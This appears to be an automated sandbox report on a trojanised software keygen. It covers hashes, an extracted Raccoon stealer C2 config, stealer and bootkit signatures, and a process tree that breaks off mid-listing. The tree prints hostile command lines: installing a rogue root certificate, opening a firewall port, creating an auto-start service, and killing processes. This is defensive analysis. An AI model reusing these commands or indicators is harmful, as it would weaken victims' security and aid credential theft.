Analysis
- max time kernel: 233s
- max time network: 306s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 09-03-2021 14:26

Static task: static1

Behavioral task behavioral1
- Sample: Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
- Resource: win10v20201028

Behavioral task behavioral2
- Sample: Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
- Resource: win10v20201028

Behavioral task behavioral3
- Sample: Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
- Resource: win10v20201028

Behavioral task behavioral4
- Sample: Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
- Resource: win7v20201028
General
- Target: Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
- Size: 36.2MB
- MD5: 865c79976b6a4688551d5be9437163aa
- SHA1: 3aa11e3924100cbb8c92c2b396eedd93279ef878
- SHA256: c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61
- SHA512: f728bf7eb0411c41f416b437e908e7727f3b25f91bdd1715964be37e16dfc7638e58c2874d910ef2d8c10d0c46ff39aede8e662b35f0161cd426e4b46efadb33
Malware Config
Extracted
- raccoon
- 51c194bfb6e404af0e5ff0b93b443907a6a845b1
- url4cnc: https://telete.in/h_focus_1
Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 3 IoCs
Resources (yara_rule: family_redline):
- behavioral1/memory/5220-248-0x0000000004950000-0x0000000004976000-memory.dmp
- behavioral1/memory/5220-241-0x0000000002580000-0x00000000025A8000-memory.dmp
- behavioral1/memory/6704-459-0x0000000000400000-0x0000000000426000-memory.dmp

Creates new service(s) 1 TTPs

Executes dropped EXE 48 IoCs
Processes (PID, process):
- 1052 KMSAuto Net.exe
- 2600 wzt.dat
- 2588 certmgr.exe
- 984 certmgr.exe
- 2364 bin.dat
- 2608 AESDecoder.exe
- 3980 bin_x64.dat
- 3284 KMSSS.exe
- 3916 bin_x64.dat
- 2448 bin_x64.dat
- 1136 FakeClient.exe
- 1324 bin_x64.dat
- 3960 FakeClient.exe
- 1596 bin_x64.dat
- 3852 FakeClient.exe
- 428 bin_x64.dat
- 2912 FakeClient.exe
- 516 bin_x64.dat
- 2240 FakeClient.exe
- 812 bin_x64.dat
- 4036 FakeClient.exe
- 3168 bin_x64.dat
- 3856 FakeClient.exe
- 2912 bin_x64.dat
- 2908 FakeClient.exe
- 2328 bin_x64.dat
- 2108 FakeClient.exe
- 2100 wzt.dat
- 804 certmgr.exe
- 1628 certmgr.exe
- 3808 bin.dat
- 896 AESDecoder.exe
- 936 bin_x64.dat
- 588 KMSSS.exe
- 1680 SppPatcher_x64.dat
- 3792 SppExtComObjPatcher.exe
- 3068 Stellar.Phoenix.Data.Recovery.crack.by.orion.exe
- 3924 keygen-pr.exe
- 2576 keygen-step-1.exe
- 988 keygen-step-3.exe
- 3692 keygen-step-4.exe
- 2380 key.exe
- 2728 Setup.exe
- 3904 key.exe
- 4244 AD754B4D3FE2C4EE.exe
- 4252 AD754B4D3FE2C4EE.exe
- 4324 askinstall20.exe
- 4380 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Modifies Windows Firewall 1 TTPs

Sets file execution options in registry 2 TTPs

Sets service image path in registry 2 TTPs

Stops running service(s) 3 TTPs

Loads dropped DLL 19 IoCs
Processes (PID, process):
- FakeClient.exe: PIDs 1136 (2 entries), 3960, 3852 (2 entries), 2912 (2 entries), 2240 (2 entries), 4036 (2 entries), 3856 (2 entries), 2908 (2 entries), 2108 (2 entries)
- SppExtComObj.exe: PID 2324
- MsiExec.exe: PID 4156

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes (description, ioc, process):
- msiexec.exe (two instances): File opened (read-only) on \??\A:, \??\B: and \??\E: through \??\Z: (every drive letter except C: and D:), each letter once per instance, 48 entries in total
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
- flow 123: ipinfo.io
- flow 190: ip-api.com
- flow 206: ipinfo.io
- flow 275: ipinfo.io
- flow 83: api.ipify.org
- flow 120: ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes (description, ioc, process):
- Setup.exe: File opened for modification \??\PhysicalDrive0

Drops file in System32 directory 4 IoCs
Processes (description, ioc, process):
- cmd.exe: File created C:\Windows\System32\SppExtComObjPatcher.exe
- cmd.exe: File opened for modification C:\Windows\System32\SppExtComObjPatcher.exe
- cmd.exe: File created C:\Windows\System32\SppExtComObjHook.dll
- cmd.exe: File opened for modification C:\Windows\System32\SppExtComObjHook.dll

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes (PID, process):
- 2728 Setup.exe

Suspicious use of SetThreadContext 1 IoCs
Processes (description, PID, process, target process):
- PID 2380 (key.exe) set thread context of PID 3904 (key.exe)

Drops file in Windows directory 16 IoCs
Processes (description, ioc, process):
- FakeClient.exe: File opened for modification C:\Windows\setuperr.log (8 entries)
- FakeClient.exe: File opened for modification C:\Windows\setupact.log (8 entries)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- AD754B4D3FE2C4EE.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000
- AD754B4D3FE2C4EE.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc
- AD754B4D3FE2C4EE.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName
- AD754B4D3FE2C4EE.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000
- AD754B4D3FE2C4EE.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes (PID, process):
- 4076 NETSTAT.EXE
- 2440 NETSTAT.EXE

Kills process with taskkill 20 IoCs
Processes (PID, process):
- taskkill.exe: PIDs 1136, 1256, 4040, 3972, 3976, 6712, 1020, 3796, 4636, 4160, 6964, 1188, 2288, 3684, 1500, 3924, 3004, 4976, 7728, 1400

Modifies data under HKEY_USERS 13 IoCs
Processes (description, ioc, process):
- reg.exe: Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588
- SppExtComObj.exe: Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress = "1.2.3.4"
- reg.exe: Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588
- SppExtComObj.exe: Key created \REGISTRY\USER\S-1-5-20\SOFTWARE
- reg.exe: Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588
- reg.exe: Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f

Modifies registry class 2 IoCs
Processes (description, ioc, process):
- Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
- Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe: Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Modifies registry key 1 TTPs 2 IoCs

Modifies system certificate store
Processes (description, ioc, process; certificate blob values are omitted):
- certmgr.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98
- certmgr.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob
- certmgr.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob
- certmgr.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98
- certmgr.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob
- askinstall20.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349
- certmgr.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98
- Setup.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob
- certmgr.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98
- certmgr.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98
- certmgr.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob
- askinstall20.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob
- certmgr.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98
- Setup.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD
Runs net.exe

Runs ping.exe 1 TTPs 7 IoCs
Processes (PID, process):
- PING.EXE: PIDs 4920, 5716, 6224, 2244, 4432, 4164, 4924

Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
- HTTP User-Agent header, flows 122, 127, 201, 217, 274: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes (PID, process):
- 1052 KMSAuto Net.exe (11 entries)
- 3792 SppExtComObjPatcher.exe (6 entries)
- 2380 key.exe (2 entries)

Suspicious behavior: LoadsDriver 8 IoCs
Processes (PID, process):
- PID 620 (8 entries; no process name recorded)

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (description, PID, process):
- AUDIODG.EXE (PID 1824): Token 33, SeIncBasePriorityPrivilege
- NETSTAT.EXE (PIDs 4076, 2440): SeDebugPrivilege
- KMSAuto Net.exe (PID 1052): SeDebugPrivilege
- taskkill.exe (PIDs 1020, 4040, 1188, 3796, 1400, 3972, 3976, 1256, 2288, 3684, 1136, 1500, 3924): SeDebugPrivilege
- msiexec.exe (PID 4104): SeSecurityPrivilege
- msiexec.exe (PID 2668): SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (several of these appear more than once in the raw table)

Suspicious use of FindShellTrayWindow 2 IoCs
Processes (PID, process):
- 2668 msiexec.exe (2 entries)

Suspicious use of SetWindowsHookEx 25 IoCs
Processes (PID, process):
- Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe: PID 3912 (2 entries)
- wzt.dat: PIDs 2600, 2100
- certmgr.exe: PIDs 2588, 984, 804, 1628
- bin.dat: PIDs 2364, 3808
- AESDecoder.exe: PIDs 2608, 896
- bin_x64.dat: PIDs 3980, 3916, 2448, 1324, 1596, 428, 516, 812, 3168, 2912, 2328, 936
- SppPatcher_x64.dat: PID 1680

Suspicious use of WriteProcessMemory 64 IoCs
Processes (description, PID, process, target process; each pair appears two or three times in the raw table):
- KMSAuto Net.exe (PID 1052) wrote to memory of cmd.exe, PIDs 3812, 1356, 3724, 2356, 480, 2168, 932, 1576, 1324, 3620, 3900, 2092, 3140, 3924, 1952, 1568
- KMSAuto Net.exe (PID 1052) wrote to memory of Netsh.exe, PIDs 3168, 772
- KMSAuto Net.exe (PID 1052) wrote to memory of sc.exe, PID 2092
- cmd.exe (PID 480) wrote to memory of wzt.dat (PID 2600)
- cmd.exe (PID 932) wrote to memory of certmgr.exe (PID 2588)
- cmd.exe (PID 1576) wrote to memory of certmgr.exe (PID 984)
- cmd.exe (PID 3620) wrote to memory of bin.dat (PID 2364)
- cmd.exe (PID 2092) wrote to memory of AESDecoder.exe (PID 2608)
- cmd.exe (PID 3924) wrote to memory of bin_x64.dat (PID 3980)
- cmd.exe (PID 1568) wrote to memory of cmd.exe (PID 1336)
- cmd.exe (PID 1336) wrote to memory of NETSTAT.EXE (PID 4076)
- cmd.exe (PID 1336) wrote to memory of find.exe (PID 2912)
Processes
-
C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\KMSAuto Net.exe"C:\Users\Admin\Desktop\KMSAuto Net.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c md "C:\Users\Admin\AppData\Local\MSfree Inc"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /c echo test>>"C:\Users\Admin\Desktop\test.test"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\wzt.datwzt.dat -y -pkmsauto3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
    - Suspicious use of WriteProcessMemory
[3] C:\ProgramData\KMSAuto\wzt\certmgr.exe
    certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
    - Suspicious use of WriteProcessMemory
[3] C:\ProgramData\KMSAuto\wzt\certmgr.exe
    certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
    - Suspicious use of WriteProcessMemory
[3] C:\ProgramData\KMSAuto\bin.dat
    bin.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
    - Suspicious use of WriteProcessMemory
[3] C:\ProgramData\KMSAuto\bin\AESDecoder.exe
    AESDecoder.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
    - Suspicious use of WriteProcessMemory
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
    - Suspicious use of WriteProcessMemory
[4] C:\Windows\system32\NETSTAT.EXE
    netstat -ano
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\find.exe
    find ":1688 "
[2] C:\Windows\System32\Netsh.exe
    C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
[2] C:\Windows\System32\Netsh.exe
    C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" start KMSEmulator
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
